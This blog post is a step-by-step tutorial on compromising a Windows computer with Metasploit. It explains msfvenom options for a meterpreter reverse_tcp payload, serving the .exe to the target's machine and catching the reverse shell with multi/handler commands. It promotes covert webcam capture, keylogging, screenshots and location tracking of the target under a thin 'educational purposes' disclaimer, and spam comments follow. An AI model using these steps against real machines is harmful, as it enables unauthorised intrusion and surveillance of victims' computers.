Hacking Windows using Metasploit Framework!!
*ONLY FOR EDUCATIONAL PURPOSES*
Intro:
Yes, you heard it right.
This blog is all gonna be about Hacking into a Windows based system and gaining complete access onto it.
Cool Stuff you can do with this:
- Take Screenshots of the targets system
- Webcam Snaps/Live Streaming
- Get access to the entire directory
- Keylogging
- Location coordinates of the target
This was all just a piece of the play. MetaSploit Framework(msf) is an area where you have to get creative to know about what all you can do with the resources provided. The more you work, the more you learn.
Without further a do, Let's get started!!
___________________________________________________________________________________
Things you'll need:
- Kali Linux(Preferably)
- Target Device
- Internet
well, that's it!
Step 1:
Fire-up your Kali and launch the terminal.
Start the PostgreSQL service from there. Metasploit uses PostgreSQL as its database so it needs to be launched first. PostgreSQL is a open source object-relational database system.
-->service postgresql start
Step 2:
Initialize the Metasploit Framework using
-->msfconsole
This might take some time to setup the services.
Meanwhile, open another tab(or window in this case) and try to find out your IP address by typing in
-->ifconfig
Step 3:
Once the msfconsole is setup, it's time to create the PAYLOAD.
While creating the payload, you need to specify the architecture and platform(Windows in this case) of the target system you are creating the payload for.
Let's understand the above code piece by piece
*msfvenom is the service used to create payloads.
*-p(p for payload) denotes gives info about the payload like 'windows/meterpreter/reverse_tcp'.
For more info on meterpreter and reverse_tcp go checkout our previous blogs.
*--platform mentions the platform of the target system(Windows in this case).
*-a specifies the architecture of the target computer(x86 is for 32 bit).
*LHOST is the IP address of the local host.
*LPORT is the listening port(by default set to 4444, for manual port number use port number above 4444 and below 9999)
*-f specifies the file type of the payload.
*-o is to specify the name and location of the output payload in your computer.
Step 4:
Now since the payload is ready, download and run the ***.exe file on the target's computer.
Here I have hosted my file directory using python3 and downloaded it from the web browser of the target.
-->python3 -m http.server {port}
Note: Hosting port should be different from listening port.
After downloading the ***.exe file on the target's computer now we are good to go with the exploitation of the target system.
-->use exploit/multi/handler
*multi/handler is a part of the MSF that handles exploits launched outside of the framework.
-->set PAYLOAD windows/meterpreter/reverse_tcp
-->set LHOST {lhost}
-->set LPORT {lport}
and now comes the final part...
-->exploit
Step 5:
After the above command, you will have to run the ***.exe program on the target's computer, following which you will receive a confirmation about the exploitation.
If you are successful in exploiting the target's computer, you will have a similar screen as below:
Voila!!!
You've successfully hacked the target's computer!
For Meterpreter commands, use
-->help
You're on your own now.
-: Teja Hara
We will be getting a reverse TCP connection from the victim machine by using a small backdoor hack windows 7 using metasploit.
ReplyDeleteamazing explain. Microsoft 365 consulting services Wisconsin
ReplyDeleteCyber Security Course in Noida
ReplyDelete